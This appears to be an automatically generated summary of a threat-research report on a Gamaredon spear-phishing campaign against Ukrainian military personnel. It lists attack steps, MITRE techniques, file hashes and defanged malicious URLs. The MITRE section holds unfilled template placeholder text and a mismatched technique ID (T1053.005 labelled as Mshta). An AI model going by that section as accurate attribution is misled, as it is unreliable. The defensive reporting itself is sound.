Threat Research

“Gamaredon’s Ongoing Spear-Phishing Assault on Ukraine’s Military”

Cyble

CRIL identifies an active Gamaredon spear-phishing campaign targeting Ukrainian military personnel, delivering malicious XHTML attachments that run obfuscated JavaScript to download payloads and leveraging TryCloudflare for anonymous hosting and evasion. The operation appears large-scale and ongoing, with victim interaction tracking via a 1-pixel image. #Gamaredon #TryCloudflare

Keypoints

  • Target: Ukrainian military personnel.
  • Method: Spear-phishing emails with malicious XHTML attachments.
  • Execution: Obfuscated JavaScript code downloads a malicious archive.
  • Malicious Payload: A Windows shortcut (LNK) file that invokes a remote .tar archive via mshta.
  • Hosting: Uses TryCloudflare’s one-time tunnel for anonymous file hosting.
  • Tracking: A 1-pixel remote image monitors victim interactions.
  • Campaign Scope: Large-scale and coordinated phishing efforts against Ukrainian entities; ongoing activity observed since August 2024.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Brief description of how it was used. Quote relevant content using bracket (‘…translated quote in English…’)
  • [T1204.002] User Execution: Malicious File – Brief description of how it was used. Quote relevant content using bracket (‘…translated quote in English…’)
  • [T1053.005] Signed Binary Proxy Execution: Mshta – Brief description of how it was used. Quote relevant content using bracket (‘…translated quote in English…’)
  • [T1027] Obfuscated Files or Information – Brief description of how it was used. Quote relevant content using bracket (‘…translated quote in English…’)

Indicators of Compromise

  • [SHA256] XHTML payload hashes – 0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b, 12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49, and other 2 hashes
  • [URL] Malicious URL – hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar, hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar, and 2 more URLs

Read more: https://cyble.com/blog/gamaredons-spear-phishing-assault-on-ukraines-military/